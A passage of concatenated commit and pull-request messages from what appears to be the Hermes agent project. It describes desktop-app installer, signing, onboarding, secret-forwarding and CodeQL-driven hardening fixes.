substring match, while the M2.x series stays at 204,800.
On macOS the desktop app is built locally and ad-hoc signed (no Developer ID
on the user's machine). An ad-hoc bundle has no stable Designated Requirement,
so when the self-updater rebuilds it in place with a fresh build (new cdhash)
— plus the com.apple.quarantine flag inherited from the downloaded installer
process chain — Gatekeeper/LaunchServices treats the changed code as tampering
and macOS reports "Hermes is damaged and can't be opened," and the app fails to
relaunch. First launch works (fresh registration); the in-place update relaunch
is what breaks.
Fix: after building the desktop app locally, strip quarantine xattrs and
re-apply a clean deep ad-hoc signature (omitting the hardened-runtime flag,
which an ad-hoc build can't satisfy). Applied in both build entry points:
- hermes_cli/main.py cmd_gui (the `hermes desktop --build-only` path the
updater drives) — so the fix ships via `hermes update` (git), no installer
re-download needed.
- scripts/install.sh install_desktop (first install) for parity.
Both are no-ops on non-macOS and when a real signing identity (CSC_LINK /
APPLE_SIGNING_IDENTITY) is configured, so signed/notarized builds are untouched.
The docker_forward_env build loop only consulted the ~/.hermes/.env disk
fallback when a key was unset (value is None), not when it was present
but empty (""). A transient empty value in os.environ was therefore
forwarded into the sandbox container as `-e KEY=`, clobbering the correct
value on disk. Sandboxed workloads then read a zero-length secret and
failed auth (observed as intermittent Linear API 401s) with no gateway
restart and no .env rewrite.
Treat empty-string like unset (`if not value:` on the fallback) and never
forward a blank secret (`if value:` on the guard).
Fixes#35580
Adds me@simontaggart.com → SiTaggart to AUTHOR_MAP so the
check-attribution gate passes for the docker_forward_env empty-secret
fix (#35583, fixes#35580).
Read the Portal's tool_access claim (JWT + /api/oauth/account) into NousToolAccessInfo and gate managed Tool Gateway access on it: tool_gateway_entitled (paid OR live pool) and per-category tool_gateway_entitled_for(). The pool funds web/image/tts/browser but not video, so per-backend availability, the charge picker (ensure_nous_portal_access coverage_category), and managed defaults all respect coverage.
Setup: rebuild prompt_enable_tool_gateway as a per-tool checklist that renders whenever the pool is enabled, lists only pool-covered tools (video excluded for free-pool users), and is framed as the free tool pool for $0 subscribers rather than a paid subscription. get_gateway_eligible_tools now gates and filters off the entitlement snapshot.
The thin installer (apps/bootstrap-installer) drives install.sh stage-by-stage,
each in its own process. The `desktop` stage never called check_node, so the
Hermes-managed Node provisioned earlier (at $HERMES_HOME/node/bin) wasn't on
PATH. install_desktop's `command -v npm` check then failed and the build was
skipped — yet the stage still reported {"ok":true,"skipped":false}, so the
installer showed "Installation Complete" and only failed at the end with
"Couldn't find a built Hermes desktop ... the desktop build step may have been
skipped or failed."
Fix:
- Call check_node in the `desktop` stage (mirrors every other Node-dependent
stage) so the managed Node is on PATH (or installed).
- Make install_desktop self-provision via check_node and hard-fail (return 1)
if npm is still unavailable, instead of a silent `return 0`. The desktop
stage only runs when a build is explicitly requested (--include-desktop), so
an unavailable toolchain is a real failure, not graceful degradation.
Verified on macOS arm64: the `desktop` stage now builds
release/mac-arm64/Hermes.app, which matches resolve_hermes_desktop_exe, so the
installer's "Launch Hermes" succeeds.
The lazy session.create path hand-builds a partial info dict that omitted
desktop_contract. The desktop GUI reads a missing contract as undefined and
treats it as an out-of-date backend, so it surfaced a "Backend out of date"
toast on every launch even against a current backend. Carry the contract in
the lazy payload like _session_info already does for resume/branch.
The desktop self-update branch defaulted to bb/gui, the pre-merge feature
branch. Now that the desktop app is on main, flip DEFAULT_UPDATE_BRANCH to
main so freshly built apps check for updates against the right branch
instead of relying on the runtime self-heal fallback.
* feat: better composer etc
* docs: add desktop and dashboard run instructions
* fix(desktop): address security scan findings
* fix(dashboard): resolve @nous-research/ui path under npm workspaces
The sync-assets prebuild step shelled out to 'cp -r
node_modules/@nous-research/ui/dist/fonts ...' with a path relative
to apps/dashboard/. That works only when the dep is installed
locally in the dashboard workspace, but 'npm install' at the repo
root (the documented setup — see apps/desktop/README.md) hoists
shared deps to the root node_modules under npm workspaces. The
relative cp then fails with 'No such file or directory', sync-assets
exits 1, the Vite build aborts, and 'hermes dashboard' surfaces a
generic 'Web UI build failed' message.
Replace the shell one-liner with scripts/sync-assets.cjs, which
walks up from the dashboard directory looking for node_modules/
@nous-research/ui — working in both the hoisted (workspaces) and
co-located (standalone) layouts. Also guards against a missing
dist/fonts or dist/assets with a clearer error pointing at a
rebuild of the UI package rather than silently copying nothing.
* feat(desktop): support connecting to a remote Hermes backend
Add HERMES_DESKTOP_REMOTE_URL and HERMES_DESKTOP_REMOTE_TOKEN env
vars that, when set, short-circuit the local-child spawn in
startHermes() and connect the Electron renderer to an already-
running 'hermes dashboard' server reachable over the network.
Motivating use case: WSL2 users who want to run the Hermes core
(agent loop, tools, filesystem access) inside their WSL
distribution while rendering the Electron GUI on native Windows.
Before this change, the desktop app always spawned a local Python
child on the same host as the renderer, which doesn't cross the
WSL/Windows boundary.
The remote path reuses waitForHermes() as a liveness probe
(/api/status is in the backend's public endpoint allowlist), so
the connection is only returned once the backend is actually
ready. WebSocket URL derivation picks ws:// or wss:// based on
the input scheme. URL validation rejects non-http(s) schemes and
requires both env vars together to avoid a half-configured
connection that would silently fall through to the spawn path.
No behaviour change when the env vars are unset — the default
local-spawn flow is untouched.
Typical usage:
# in WSL2
hermes dashboard --tui --no-open --host 0.0.0.0 --port 9119 --insecure
# on Windows
set HERMES_DESKTOP_REMOTE_URL=http://localhost:9119
set HERMES_DESKTOP_REMOTE_TOKEN=<session token>
set HERMES_DESKTOP_IGNORE_EXISTING=1
(launch Hermes desktop)
* ci(desktop): automate desktop releases
Add GitHub Actions release channels for signed desktop installers and document the stable/nightly download paths.
* feat: file tabs
* refactor(desktop): tighten right-rail tab close API
Promote closeRightRailTab/closeActiveRightRailTab as the single
public entry point. Drops the activeTabRef + handleCloseDocument
indirection in ChatPreviewRail, the unused $rightRailHasContent
atom, and the legacy dismissFilePreviewTarget alias. -70 LOC.
* feat(desktop): polish composer pill toward reference look
Solid foreground-on-background send/voice-conversation circle (black-on-white
in light, white-on-black in dark) anchors the right edge as the primary CTA
instead of the orange theme primary. Bumps the primary control to 2.125rem so
it visually outranks the ghost mic/plus controls. Opens up the surface padding
(0.625rem x / 0.5rem y) so the input row breathes around its controls, and
nudges the corner radius from 20 to 24px for a slightly pill-ier silhouette.
LiquidGlass distortion is preserved.
* feat(desktop): add startup and onboarding flow
Add phase-based desktop boot progress, fresh-install sandbox testing, and first-run provider credential onboarding so packaged installs can start cleanly without manual settings detours.
* fix(desktop): gate prompts on provider setup
Show the desktop provider onboarding flow before prompt submission when no inference provider is configured, preventing fresh installs from falling through to backend credential errors.
* fix(desktop): surface provider onboarding from session warnings
Propagate credential warnings through session runtime info and open desktop onboarding whenever a session reports no usable provider, so unconfigured installs cannot fall through to prompt errors.
* fix(desktop): route gateway provider errors to onboarding
The "No inference provider configured" auth error reaches the renderer through gateway error events, not the prompt.submit promise; the previous patch only caught the latter, so the error toast still surfaced and onboarding never opened.
Also strip credential-shaped env vars from the test:desktop:fresh sandbox so the packaged backend can't see provider keys leaking from the launching shell.
* fix(desktop): use strict runtime check to drive onboarding
setup.status returned True whenever any provider auth state was discoverable, including indirect fallbacks like a gh-CLI Copilot token. That made desktop think the user was set up while the agent's actual resolve_runtime_provider call still raised AuthError, leaving the user with a useless toast and no onboarding.
Add a setup.runtime_check gateway method that runs the same resolver the agent uses on session creation, and switch the desktop onboarding overlay and prompt precheck to use it.
* feat(desktop): OAuth-first onboarding using existing dashboard provider API
Replace the engineer-flavored API key form with a Sign-in-first onboarding overlay that uses the dashboard's existing /api/providers/oauth catalog and PKCE/device-code endpoints (Anthropic, Nous, OpenAI Codex, etc.). API key entry is now a fallback tab with friendly provider names instead of env var prefixes, and the loud raw resolver error is gone in favor of a one-line welcome message.
* fix(desktop): polish onboarding provider list
Reorder OAuth providers so Nous Portal is first, give the segmented Sign in / API key control equal column widths, and replace the engineer-flavored backend names like "Anthropic (Claude API)" / "MiniMax (OAuth)" with friendlier in-app titles. External-CLI providers now show a softer subtitle and an external-link icon instead of a chevron.
* refactor(desktop): split onboarding overlay into store + view
Move the OAuth state machine, runtime check, copy-to-clipboard, and api-key save into store/onboarding.ts (matching the boot.ts pattern), leaving the overlay as a presentation layer that subscribes via useStore. Tabs are now table-driven, child panels read flow from the store instead of prop-drilling, and the polling/PKCE/error/success branches share a small Status atom.
* fix(desktop): external CLI providers + center mode tabs
External-CLI providers (Claude Code, Qwen Code) now open an in-overlay panel with the CLI command, copy button, and an "I've signed in" recheck instead of firing an invisible toast. Center the Sign in / API key tab control so it sits under the heading instead of hugging the left edge.
* fix(desktop): drop onboarding tabs for an inline link, group device-code waiting state
Replace the Sign in / API key tab pair with an "I have an API key" footer link under the OAuth provider list, with a "Back to sign in" affordance inside the API key form. Group the device-code "Waiting for you to authorize..." status next to the Cancel button so the alignment matches the action.
* refactor(desktop): tighten onboarding store + overlay
Drop the dead isOnboardingBusy/BUSY set, factor the catch-fallback dance into safeReq, and share a single reloadAndConnect helper between PKCE submit, device-code success, external recheck, and api-key save.
In the overlay, extract Step / CodeBlock / FlowFooter / CancelBtn / DocsLink atoms so the four sign-in panels share the same chrome instead of repeating it inline. Net effect: fewer literal divs, one place to touch the spacing, and the code-block + footer rows are reusable across future flows.
* fix(desktop): mount onboarding from frame 1 to kill the FOUT
Default onboarding.configured to null (unknown until the runtime check resolves) and have the onboarding overlay render whenever it's not yet confirmed true. The boot overlay now yields to it, so the very first paint is the Welcome card with a "While we get you set up..." progress strip instead of a flash of the chat shell between boot dismiss and onboarding mount.
The picker swaps in cleanly once the gateway opens and the runtime check confirms the user is not configured. Already-configured users see the same prep card briefly while their existing runtime warms up, then the overlay dismisses without touching the chat shell.
* fix(desktop): top-align empty sessions placeholder
The "Start a chat to build your history." empty state used a min-h-35 grid place-items-center container, which floated the text in a tall dead zone. Render it as a flat paragraph that sits right under the section header like the empty pinned state does.
* refactor(desktop): drop dead boot overlay
Onboarding overlay subsumes the boot card now that it mounts from frame 1 and renders boot progress inline. The standalone DesktopBootOverlay is unreachable in every flow (yields whenever onboarding has not confirmed configured, dismisses once it has).
* fix(desktop): hide pinned/recents sections until first session
A fresh sidebar showed the Pinned and Recent chats headers with floating empty-state copy underneath. Drop both sections (and the now-orphan SidebarEmptySessionState) when there are no sessions yet — they reappear after the first chat. Skeletons during initial load are unchanged.
* feat(gui): route embedded TUI through dashboard gateway (#21979)
Inject HERMES_TUI_GATEWAY_URL into dashboard PTY sessions so embedded ui-tui instances attach to the in-process websocket gateway, with coverage for the new env wiring.
* Add desktop remote gateway settings
Make the desktop gateway connection configurable from settings so local remains the default while remote backends can be saved, tested, and applied without environment variables.
* feat(gui): first-class Messaging page + gateway menu redesign
- Add Messaging page to the desktop app with per-platform setup,
status, and inline guidance. Catalog derives from gateway.config
Platform enum + plugin registry, so every messaging adapter the CLI
supports (Telegram, Discord, Slack, Mattermost, Matrix, WhatsApp,
Signal, BlueBubbles, Home Assistant, Email, SMS, DingTalk, Feishu,
WeCom, Weixin, QQ, Yuanbao, API server, Webhooks, plugins) shows up
without per-platform code.
- New REST endpoints: GET /api/messaging/platforms, PUT and POST
/test on the same path. Secrets go through the existing .env
pipeline; enable/disable writes config.yaml.
- Replace gateway statusbar dropdown with a richer panel: status row,
icon-only restart + system-panel actions, recent activity (with
timestamps trimmed in display, full text on hover), platform list.
- Auto-poll the messaging page every 6s (paused when hidden) so
status updates without a manual check.
- Drop Settings / Command Center from the sidebar nav (still
reachable via shortcuts and the titlebar cog).
- Flatten top corners on Messaging/Skills/Artifacts/Chat panes.
- Share new StatusDot component across messaging + gateway menu.
- Fix gateway/config.py so an explicit platforms.<name>.enabled=false
in config.yaml is honored when env tokens are present.
- pb-9 on the chat content area for breathing room above the composer.
* Potential fix for pull request finding 'CodeQL / Clear-text logging of sensitive information'
Co-authored-by: Copilot Autofix powered by AI <62310815+github-advanced-security[bot]@users.noreply.github.com>
* pin electron version
* hide application menu on non-mac systems
* interpret compactPreview for non-string vlaues as JSON or an empty string
* fix(desktop): keep composer contenteditable mounted across stacked toggle
The composer rendered {input} inside two different parent fragments
depending on `stacked`. When auto-expand flipped `stacked` (e.g. the
moment typed text wrapped past two lines), React reconciled the two
branches as different positions and unmounted/remounted the
contenteditable. The fresh mount started empty, so any in-flight
characters — most reliably reproduced by holding a key — were lost.
Replace the conditional with a single CSS Grid whose template-areas
swap on `stacked`. The three children (menu, input, controls) keep
stable identities across the toggle; only their grid placement
changes, which the browser handles without React tearing down the
editor.
* refactor(desktop): align install layout with install.ps1 / install.sh
Make the desktop app's runtime layout match what scripts/install.ps1 and
scripts/install.sh produce, so a desktop-only user and a CLI-only user end
up with the same files in the same places and can share one install.
Layout
- ACTIVE_HERMES_ROOT = HERMES_HOME/hermes-agent (was: process.resourcesPath/hermes-agent, read-only)
- VENV_ROOT = HERMES_HOME/hermes-agent/venv (was: userData/hermes-runtime)
- desktop.log = HERMES_HOME/logs/desktop.log (was: userData/desktop.log)
- HERMES_HOME default: %LOCALAPPDATA%\hermes on Windows, ~/.hermes elsewhere
The packaged .app/.exe still ships a read-only payload at
process.resourcesPath/hermes-agent (FACTORY_HERMES_ROOT). On first launch
or after an installer-driven upgrade we sync factory -> active, then
provision the venv and run pip install -e . against the active root.
Key behaviors
- Pin HERMES_HOME in the spawned Python's env so get_hermes_home() resolves
to the same path resolveHermesHome() picked. Without this, Python falls
back to ~/.hermes on every platform - fine on mac/linux, a split-state
bug on Windows where our default is %LOCALAPPDATA%\hermes.
- Detect developer installs by .git presence at ACTIVE; never overwrite
a user's checkout via factory sync.
- Marker at ACTIVE/.hermes-desktop-runtime.json (schema v4) tracks
pyproject hash + factory version + runtime schema version. depsFresh
fast-paths when nothing changed.
- Dev (npm run dev) prefers SOURCE_REPO_ROOT over ACTIVE so devs run
their local edits, not whatever's under HERMES_HOME.
- Better error messages distinguish "no payload" from "no Python".
- Preserve a legacy ~/.hermes on Windows when no %LOCALAPPDATA%\hermes
exists, so users with prior pip/manual installs aren't orphaned.
pyproject.toml
- Promote fastapi, uvicorn[standard], ptyprocess (non-Windows), and
pywinpty (Windows) to main dependencies. The dashboard backend
(hermes dashboard) needs them at runtime; the previous lazy-import
fallback was a footgun for fresh installs.
- Empty the [pty] optional-extra; kept as a no-op back-compat alias for
any existing pip install hermes-agent[pty] invocations.
Drops the hardcoded BUNDLED_RUNTIME_REQUIREMENTS list in main.cjs - the
desktop now installs whatever pyproject.toml says, single source of truth.
Files
- apps/desktop/electron/main.cjs: runtime layout, HERMES_HOME pin,
factory->active sync, marker v4
- apps/desktop/scripts/test-desktop.mjs: track new venv location
- apps/desktop/README.md: new Setup, Runtime Bootstrap, and
Debugging sections
- pyproject.toml: fastapi/uvicorn/pty backends in main
dependencies; [pty] extra emptied
Tested locally on Windows: npm run dev boots cleanly, sessions land at
the new location, type-check + lint + test:desktop:platforms all pass.
Verified end-to-end on a fresh Win11 VM via dist:win installer.
Known gaps (filed as follow-ups, not in this PR):
- Skills not seeded on packaged installs (sync_skills only runs in
cmd_chat, not cmd_dashboard). Need to move to shared pre-dispatch.
- Git Bash not bundled or detected; agent's terminal tool errors out
with a useful message but desktop bootstrapper should pre-flight it.
- install.ps1 / install.sh should be decomposed into composable phase
libraries so the desktop bootstrapper can reuse them as a single
source of truth across all install surfaces.
* feat(desktop): theme polish, prose chat typography, composer chrome
- DS tokens/midground, Backdrop, scoped scrollbars, typography plugin + prose
- Composer liquid/radius utilities, thread font parity, tool/thinking cues
- File tree label scale, preview flex, thread retry loading + streaming tests
* feat(desktop): NSIS prereq detection page + auto-install via winget
The packaged Windows installer now detects Python 3.11+ and Git for Windows
at install time and offers to install missing prereqs via winget. Mirrors
the prereq logic scripts/install.ps1 already runs for CLI installs, so
desktop installer users get the same out-of-the-box experience as
install.ps1 users.
Why
- Hermes' terminal tool calls bash.exe directly (tools/environments/
local.py); on Windows that's Git Bash from Git for Windows. Without it,
the agent fails on the first terminal() call.
- Hermes' Python runtime needs 3.11+. Without it, the desktop bootstrapper
errors out at venv creation.
- Both gaps surfaced on a fresh Windows 11 VM smoke test: VM had Python
pre-installed but no Git, so the agent's first terminal call failed
with "Git Bash isn't installed."
- install.ps1 has had Install-Git + Install-Uv functions for ages. The
desktop installer was the asymmetric outlier.
How — NSIS prereq page
- New file: apps/desktop/installer/prereq-check.nsh (plugged into
electron-builder via build.nsis.include)
- Real Wizard page using nsDialogs, inserted via customPageAfterChangeDir
hook (between the Directory page and InstFiles).
- Group boxes for Python and Git, each showing detection status.
- Pre-checked install checkboxes when winget is available.
- Auto-skips silently if both prereqs are already installed.
- Falls back to manual download URLs when winget itself is missing.
- Detection:
- Python: probes `py -3.11`/`-3.12`/`-3.13`/`-3.14` via the Python
launcher. Microsoft Store "Python stub" (no py.exe) is correctly
classified as not-installed.
- Git: `where git`.
- winget: `where winget` (Win10 1809+ / Win11 with App Installer).
- Install execution (in customInstall macro):
- Python: nsExec::ExecToLog with `--scope user --silent`. Per-user
install, no UAC prompt, output streams to install log.
- Git: ExecShellWait via Windows ShellExecute. Critical because Git
always installs per-machine and triggers UAC; ShellExecute preserves
the foreground focus chain across non-elevated → elevated process
spawns, so UAC actually comes to the foreground. nsExec::ExecToLog
breaks the chain because winget runs hidden.
- Both pass `--disable-interactivity --accept-package-agreements
--accept-source-agreements` to suppress winget's own dialogs.
- Verification: probes Git's standard install locations via FileExists
rather than `where git`. NSIS's process inherits PATH at startup, so
a freshly-installed Git won't be visible to `where` until restart.
- Silent installs (/S) skip the prompts; managed deploys handle prereqs
out-of-band via Group Policy / Intune.
How — Electron-side safety net
- New findGitBash() in main.cjs, parallel to findSystemPython(). Probes
the same locations as tools/environments/local.py:_find_bash() so a
positive result here means the agent's terminal tool will work.
- ensureRuntime now throws a clear, actionable error on Windows when Git
Bash isn't found, matching the existing "Python 3.11+ is required"
error path.
- Catches users the NSIS page doesn't: .msi installer users (NSIS prereq
page doesn't run for MSI), `npm run dev` users, manual installers,
anyone who unchecked the install boxes on the NSIS prereq page.
- All gated on `IS_WINDOWS`; macOS / Linux unaffected.
NSIS build issue (resolved)
- electron-builder defaults to `-WX` (warnings as errors). NSIS optimizer
emits "warning 6010: function not referenced" for our page functions
because Page custom directives don't count as references in its
static-analysis pass. The functions ARE called at runtime when NSIS
invokes the page; the optimizer just can't see it statically.
- Set `build.nsis.warningsAsErrors=false` in package.json so this
spurious warning doesn't fail the build. (Documented option from
electron-builder's nsisOptions.)
Out of scope (filed for future work)
- MSI prereq detection: Windows Installer custom actions are a different
mechanism. Enterprise deploys typically handle prereqs via GP/Intune.
- Bundle PortableGit + python-build-standalone in extraResources for
zero-network installs. ~80MB increase.
- Mac / Linux GUI prereq flows (different installer formats; Xcode CLT
covers most macOS prereqs already; Linux is per-distro hard).
Files
- apps/desktop/installer/prereq-check.nsh (new, ~290 lines NSIS)
- apps/desktop/package.json (build.nsis.include +
warningsAsErrors)
- apps/desktop/electron/main.cjs (findGitBash + preflight)
- apps/desktop/README.md (Runtime prerequisites
section)
Cross-platform impact
- macOS / Linux builds (dist:mac, dist:mac:dmg, dist:mac:zip): nsis
config is ignored entirely; .nsh is dormant.
- npm run dev: .nsh dormant; main.cjs preflight gated on IS_WINDOWS.
- scripts/install.ps1, scripts/install.sh: no reference to any new
files; CLI install paths untouched.
- Hermes CLI / dashboard / gateway: no reference; runtime untouched.
- All checks: node --check on main.cjs and test-desktop.mjs pass;
npm run test:desktop:platforms 4/4 passing; node --test green.
Tested
- npm run dist:win produces signed .exe and .msi without errors.
- Fresh Win11 VM (Python pre-installed, no Git): prereq page renders,
Python check shows detected, Git checkbox pre-checked. Click Next →
Git installs via winget with UAC prompt in foreground.
- After install completes, Hermes launches and the agent's terminal
tool can run bash commands. Verified Git Bash is detected at
`C:\Program Files\Git\bin\bash.exe` by ensureRuntime's preflight.
* feat: theme changes, composer tweaks, in app update ux, finesse
* fix(cli): seed bundled skills on dashboard + gateway entrypoints
`sync_skills(quiet=True)` was only being called from inside `cmd_chat`,
which meant `hermes dashboard` (the desktop GUI's backend) and `hermes
gateway` (Telegram/Discord/Slack/etc daemons) never seeded the bundled
skill library into ~/.hermes/skills/.
This surfaced as "No skills found" in the desktop GUI's skills panel on
fresh installs, despite the agent having access to the full bundled
library when invoked via `hermes chat`. scripts/install.ps1 worked
around it by running skills_sync.py as part of Copy-ConfigTemplates,
but that's not part of the desktop installer's bootstrap chain.
Fix
- Extract the skills-sync block from cmd_chat into a module-level
`_sync_bundled_skills_quietly()` helper.
- Call the helper from cmd_chat (preserving existing behavior),
cmd_dashboard (after the --status/--stop early-return paths and
fastapi import check, so we don't run skills_sync on management
commands or when deps aren't installed), and cmd_gateway.
Why these three entrypoints
- cmd_chat: the user's primary CLI entrypoint
- cmd_dashboard: the desktop GUI's backend; this is what `hermes
dashboard --tui` invokes when the desktop bootstrapper spawns Hermes
- cmd_gateway: long-running daemons where the user expects the agent
to have full skill access
Other entrypoints (cmd_config, cmd_doctor, cmd_login, cmd_status,
etc.) are management commands that don't need skill discovery and were
never running skills_sync in the first place — leaving them alone.
Idempotence
- tools/skills_sync.py is manifest-based: skipped skills cost
milliseconds. Calling it from multiple entrypoints adds no real
cost, and users running `hermes chat` then `hermes dashboard` get
two fast no-ops on the second call.
Failure handling
- Helper wraps skills_sync in try/except. Skills are an enhancement,
not a hard dependency — Hermes runs fine with an empty skills/ dir.
Files
- hermes_cli/main.py:
+ new helper `_sync_bundled_skills_quietly()` at module level
+ cmd_chat: replace inline block with helper call
+ cmd_dashboard: add helper call after fastapi import succeeds
+ cmd_gateway: add helper call before delegating to gateway_command
* feat(desktop): hoisted todo widget, JSON tool summaries, history grouping & timer fixes
- Hoist todo to first-class widget (shadcn checkboxes, brand colors, no
tool-accordion). Header derives label from active task; non-active rows fade.
- Replace raw JSON dumps with structured key/value summaries via
formatToolResultSummary; nested error extraction for clearer failures.
- Fix loaded-session grouping: stitch interleaved assistant/tool iterations
into one bubble instead of orphaned synthetic messages.
- Stable tool/thinking timers via keyed registry so unmount/scroll doesn't
reset elapsed counts; gate "running" on real live thread state.
- Reorganize chat-only assistant-ui components under components/chat/.
* fix(desktop): address CodeQL alerts on PR #20059
- settings/helpers.ts: harden setNested against prototype pollution.
POLLUTING_PATH_PARTS check is now applied at every assignment site
(loop + leaf) and uses Object.defineProperty so CodeQL can see the
guard inline rather than via a helper function call.
- lib/markdown-preprocess.ts: rebuild the dangling-fence close regex
from a fence-char + length instead of marker.replace(...). The marker
is captured by `(`{3,}|~{3,})` so it can only be backticks or tildes,
but CodeQL was tracing tainted input text into the RegExp source and
flagging hostname dots from input as part of the pattern (false
positive js/incomplete-hostname-regexp on the test fixture URLs).
Reconstructing from a literal char breaks the dataflow.
- scripts/notarize-artifact.cjs: drop args from the run() rejection
message. Args carry --key-id / --issuer / key file path; the existing
outer catch already squashes errors to a generic line, but CodeQL was
flagging the args.join(' ') as clear-text logging of APPLE_API_KEY_ID.
Composer DOM-text-as-HTML alerts (composer/index.tsx:379, :547) are
already addressed in 4dd9732a9 — innerHTML assignment was replaced with
renderComposerContents which builds DOM via replaceChildren / append
text nodes (no HTML interpretation).
* fix(desktop): inline prototype-pollution guard so CodeQL sees it
CodeQL's dataflow doesn't follow the helper-function guard inside
`safeSet`, so it kept flagging Object.defineProperty as prototype-
polluting. Inline the literal `__proto__`/`constructor`/`prototype`
check at the assignment site to break the dataflow.
Behavior unchanged — same set of disallowed keys, same throw.
* feat(ui-tui): resolve links to readable page titles
Mirror desktop pretty-link behavior in the TUI by resolving HTTP links to page titles with shared caching and safe fetch filters, plus slug-based fallbacks so chat links stay readable even when title fetch fails.
* fix(desktop): drop RegExp from dangling-fence close detection
Previous attempt tried to break the dataflow by reconstructing the
close-fence regex from a literal char + marker.length, but CodeQL still
traced marker.length back to input and kept flagging the test-fixture
URLs as hostname-regex sources (js/incomplete-hostname-regexp).
Replace `new RegExp(...)` + `closeRe.test(body)` with a string-only
hasCloseFenceLine() helper that splits on '\n' and uses ===. No regex
on this path now, so input data can no longer reach a RegExp source.
Behavior preserved: matches lines that are (whitespace + marker +
whitespace), which is what the original `\n[ \t]*${marker}[ \t]*(?=\n|$)`
matched. All 12 markdown-text tests still pass.
* fix(process-registry): suppress windows-footgun false positive on guarded killpg
Keep the existing POSIX-only process-group teardown path, but make the
signal selection explicit via getattr and add an inline windows-footgun
suppression marker on the guarded os.killpg line so the Windows footgun
check no longer blocks CI on this intentionally platform-gated code.
* feat(desktop): reconcile live tool events, polish thread chrome, harden boot
- chat-messages: match tool rows by overlapping query/context/preview values
so preview-first `tool.progress` rows reliably adopt later stable-id
`tool.start` payloads instead of spawning ghost rows or mis-merging
parallel same-name calls; preserve prior args/result across phases.
- tui_gateway: emit full args + parsed result on `tool.start` / `tool.complete`,
drop redundant `tool.started` re-emit from `tool.progress`.
- electron/main: prefer SOURCE_REPO_ROOT before PATH `hermes` in dev so
local backend edits actually run; split hardening helpers into
`electron/hardening.cjs` with tests.
- thread/tool UI: one-shot enter animation keyed by stable ids, braille
spinner for running rows, Cursor-like disclosure rows, drill-down +
duration/count formatting via new tool-fallback-model.
- composer: extract `text-utils`, drop liquid-glass overrides.
- right-rail: split preview-pane into preview-console / preview-file.
- runtime: incremental external-store runtime + runtime-readiness gate;
onboarding store + tests; route-resume hook test.
- regression tests for live tool reconciliation (parallel tools, id-less
progress, preview-first rows, structured args/results).
* feat(desktop): add ripgrep to NSIS prereq page + polish layout
Add ripgrep as a third (recommended) prereq alongside Python and Git in
the NSIS prereq detection page, and clean up the page layout based on
on-VM testing.
Why ripgrep
- Hermes' search_files tool calls `rg` directly for content + filename
search (tools/file_operations.py:1382). Falls back to grep/find from
Git Bash when missing — works but slower and noisier (no .gitignore
awareness).
- ~5MB winget install via `BurntSushi.ripgrep.MSVC --scope user` — no
UAC prompt, parallel to how Python installs.
- scripts/install.ps1 already installs ripgrep as part of
Install-SystemPackages; this brings the desktop installer to parity.
Why "recommended" not "required"
- Python and Git are hard requirements: without them the agent runtime
or terminal tool refuses to start. The bootstrapper preflight throws.
- ripgrep is a performance enhancement: missing it just means slower
searches. Page wording reflects this; failure to install is logged
but doesn't show a MessageBox or block.
Layout polish (response to on-VM screenshot review)
- Wizard header now correctly reads "System Requirements" instead of
the leftover "Choose Install Location" from the previous page. Set
via `GetDlgItem $HWNDPARENT 1037/1038` + WM_SETTEXT — the standard
NSIS pattern for overriding the page header on a custom Page.
- Removed redundant in-body title + verbose intro paragraph; the
wizard header IS the title now. Body has one short intro line.
- Group boxes tightened to 26u with content positioned just below the
groupbox title (not top-anchored status + bottom-anchored checkbox
with empty space in the middle). All three panels + footer fit
comfortably in 126u, well under the 140u page limit.
- Checkbox labels simplified: dropped "(per-user, no admin prompt)"
and "(administrator approval required)" suffixes. The footer note
still calls out UAC for Git when relevant.
- Footer text trimmed to fit cleanly without clipping.
Install order (in customInstall macro)
- Python → ripgrep → Git
- Python and ripgrep are silent and run first; Git's UAC prompt comes
last so the user's approval interaction isn't interrupted by silent
activity afterwards.
Skip behavior unchanged
- All three detected → page auto-skips via Abort
- Silent install (/S) → customInstall winget block skips
- User unchecks all → page advances without running winget
Files
- apps/desktop/installer/prereq-check.nsh: ripgrep detection block,
ripgrep page panel + checkbox, ripgrep customInstall block,
GetDlgItem header override, layout reflow
- apps/desktop/README.md: Runtime prerequisites section updated to
list ripgrep as recommended, with manual winget command
* feat(desktop): add model-confirmation step to onboarding
After OAuth/API-key login completes, onboarding now shows a confirmation
card with the curated default model and a Change button before dropping
the user into chat. Closes the gap where the desktop's `model.default`
was empty after first launch and the agent had to fall back to whatever
heuristic happened to fire — leaving users wondering "why am I getting
sonnet-4 when I logged into Nous Portal?"
Why
- Desktop onboarding only persisted credentials, never `model.default`.
The CLI's `hermes model` command pairs provider + model selection,
but the desktop's onboarding skipped the model step entirely.
- Result: users saw whichever model the agent's auto-fallback picked,
unpredictably and undocumented.
- For the BUILD demo we want users to land on the model they expect
for their provider, with a clear "this is what you're getting" UI
and a one-click path to change it before chatting.
How
- New `confirming_model` flow status carries the just-authenticated
provider slug, current default model, label, and a saving flag.
- `completeWithModelConfirm()` runs after credentials succeed: reloads
env, verifies runtime, fetches /api/model/options to find the curated
first-model for the provider, persists it via /api/model/set, then
transitions into `confirming_model`.
- If anything fails (no providers returned, network error), falls
through to the previous behaviour — onboarding completes without
the confirm step. Polish, not a hard requirement.
- All four credential paths (device_code OAuth, PKCE OAuth, external
CLI flow, API key) now use completeWithModelConfirm instead of
reloadAndConnect.
UI
- `ConfirmingModelPanel` shows: green "<provider> connected" banner,
card with "Default model: <name>" + Change button, and a "Start
chatting" CTA that finalises onboarding.
- Reuses the existing `ModelPickerDialog` (the same picker available
from the chat shell) for the change-model UX. Search, filtering,
multi-provider listing — all already built.
- Stacking: ModelPickerDialog defaults to z-130, which renders UNDER
the onboarding overlay (z-1300) and breaks pointer events. Added
optional `contentClassName` prop to ModelPickerDialog so callers
can override; onboarding passes `z-[1310]`.
Provider-slug matching
- For OAuth flows: pass `provider.id` directly as the preferred slug.
- For API-key flows: `OPENROUTER_API_KEY` → "openrouter" via env-key
prefix strip. Also includes the user-visible label as a fallback
candidate.
- fetchProviderDefaultModel falls back to the first authenticated
provider in the response if no preferred slug matches — so even a
miss still surfaces a reasonable default.
Files
- apps/desktop/src/store/onboarding.ts:
+ new `confirming_model` flow variant
+ fetchProviderDefaultModel + completeWithModelConfirm helpers
+ setOnboardingModel (optimistic update + revert on failure)
+ confirmOnboardingModel (finalises onboarding from the card)
- reloadAndConnect (replaced; the four call sites now go through
completeWithModelConfirm)
- apps/desktop/src/components/desktop-onboarding-overlay.tsx:
+ ConfirmingModelPanel component
+ new branch in FlowPanel for status `confirming_model`
+ ModelPickerDialog usage with z-[1310] content class
- apps/desktop/src/components/model-picker.tsx:
